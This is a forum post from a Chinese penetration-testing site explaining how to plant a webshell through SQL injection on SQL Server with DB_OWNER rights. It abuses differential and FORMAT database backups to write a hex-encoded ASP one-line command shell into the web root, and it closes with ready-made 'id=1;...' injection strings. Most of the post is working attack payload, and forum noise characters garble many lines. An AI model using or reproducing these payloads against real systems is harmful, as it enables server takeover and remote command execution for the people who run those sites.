中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]
作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少
  X6 Z. k. j  I1 I9 G  f
! ^2 W, z  ?) J0 N  Y一利用差异备份
# `" C6 ~) w$ T% ~% w. \加一个参数WITH DIFFERENTIAL
  V) v+ Z( o3 q1 u# ~) M/ {1 B
0 l. @, H8 p% ~2 c, ]0 pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
! t5 B8 ?% n( g  P8 _1 f( e3 qcreate table [dbo].[xiaolu] ([cmd] [image]);1 ~3 {* g% t  M1 P- a* V% {; B6 z
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)- m$ j& \+ {- r' ]6 @
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
9 p. I: V, D' i  S* M6 D8 a/ F& Z
3 s7 z6 t  \# W6 _二利用完全FORMAT
! o( f  N6 P4 y5 D, F$ X9 t- X加一个参数WITH FROMAT
9 E/ y; [' a5 u3 ~* l有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以" s% ^: N; e& A
; k. ^; T7 Y( b  B8 m$ e3 e
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
$ X7 K$ V. Y8 w3 Kcreate table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)# A# X7 O" @9 T- Z8 S7 A
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
# [! [+ K. X- S* s- v% w' d! l: A+ F% [9 P
总的来说就是那么简单几句,下面以备份数据库model为例子
0 t+ O, y. g: X/ w* l" @6 d5 i5 K0 \$ I+ e8 n' [  }5 |7 p* C8 }
id=1;use model create table cmd(str image);insert into cmd(str) values (”)
' {2 O! `. i7 Y# t5 ?" A6 z+ j" ~9 {. q& b/ s; f7 d8 K! }1 M# `
id=1;backup database model to disk=’你的路径‘ with differential,format;–$ n0 S7 v; j- V" B4 F
% b) N8 o: c' `; x




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2